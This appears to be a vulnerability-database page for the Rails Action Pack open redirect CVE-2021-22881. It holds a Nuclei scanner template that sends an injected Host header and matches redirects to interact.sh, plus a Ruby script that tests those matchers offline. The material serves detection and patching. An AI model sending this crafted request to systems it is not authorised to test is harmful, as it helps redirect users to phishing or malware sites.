Ruby on Rails - Open Redirect via Host Header Injection
CVE-2021-22881
Verified
Description
Ruby on Rails Action Pack before 6.1.2.1 and 6.0.3.5 contains an open redirect caused by specially crafted Host headers in combination with certain allowed host formats, letting attackers redirect users to malicious websites. Exploitation requires the attacker to control the Host header.
Severity
Medium
CVSS Score
6.1
Exploit Probability
87%
Published Date
January 21, 2026
Template Author
theamanrawat
CVE-2021-22881.yaml
id: CVE-2021-22881

info:
  name: Ruby on Rails - Open Redirect via Host Header Injection
  author: theamanrawat
  severity: medium
  description: |
    Ruby on Rails Action Pack before 6.1.2.1 and 6.0.3.5 contains an open redirect caused by specially crafted Host headers in combination with certain allowed host formats, letting attackers redirect users to malicious websites. Exploitation requires the attacker to control the Host header.
  impact: |
    Attackers can redirect users to malicious sites, potentially leading to phishing or malware distribution.
  remediation: |
    Update to version 6.1.2.1, 6.0.3.5 or later versions.
  reference:
    - https://hackerone.com/reports/1047447
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22881
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-22881
    epss-score: 0.87239
    epss-percentile: 0.99726
    cwe-id: CWE-601
  metadata:
    verified: false
    max-request: 1
  tags: cve,cve2021,ruby,rails,host-header,redirect,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: interact.sh#{{randstr}}.{{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        condition: or
        status:
          - 302
          - 301
# digest: 4a0a00473045022100ddec812f40a2725db7a89d3b1d8fa568e7343f098b0347988fc916d3bbb6ff0902200982daed65e57f4c4c184b6423e50d564f1a90d9b24efdc66611a319935e3a6e:922c64590222798bb761d5b6d8e72950
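To check the template's matcher logic offline, the following is an added Ruby example (not part of the Nuclei template or of Rails) that re-implements the regex and status matchers under the template's `and` condition and runs them over constructed sample responses. Ruby's `^` and `$` already anchor at line boundaries, so the Go-style `(?m)` flag is dropped from the pattern.

```ruby
# Added example, not part of the Nuclei template or of Rails: the template's two
# matchers re-implemented in Ruby so the detection logic can be exercised offline.

# Same pattern as the template's regex matcher. Ruby's ^ and $ are already
# line anchors, so Go's (?m) flag is not needed.
LOCATION_RE = %r{^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$}

# Status matcher: 302 or 301 (condition: or).
REDIRECT_STATUSES = [302, 301].freeze

# Split a raw HTTP response into its status code and header block (part: header).
def parse_response(raw)
  head = raw.split(/\r?\n\r?\n/, 2).first
  status_line, *header_lines = head.split(/\r?\n/)
  status = status_line[/\AHTTP\/\d\.\d\s+(\d{3})/, 1].to_i
  [status, header_lines.join("\n")]
end

# matchers-condition: and -> the response must satisfy both matchers.
def template_matches?(raw)
  status, headers = parse_response(raw)
  REDIRECT_STATUSES.include?(status) && headers.match?(LOCATION_RE)
end

# Constructed sample responses (not captured traffic).
SAMPLES = {
  # Location echoes the injected host: both matchers fire.
  vulnerable:   "HTTP/1.1 302 Found\r\nLocation: http://interact.sh#abc123.app.example.com/\r\n\r\n",
  # Scheme-relative redirect, covered by the regex's (?:https?://|//)? group.
  protocol_rel: "HTTP/1.1 301 Moved Permanently\r\nLocation: //interact.sh/\r\n\r\n",
  # Redirect to the application's own host: the regex matcher does not fire.
  safe:         "HTTP/1.1 302 Found\r\nLocation: https://app.example.com/login\r\n\r\n",
  # No redirect; the string in the body is ignored because of part: header.
  no_redirect:  "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>interact.sh</p>",
}.freeze

SAMPLES.each { |name, raw| puts format("%-13s %s", name, template_matches?(raw)) }
```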
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2021-22881
CWE ID:
CWE-601
Remediation Steps
Update to version 6.1.2.1, 6.0.3.5 or later versions.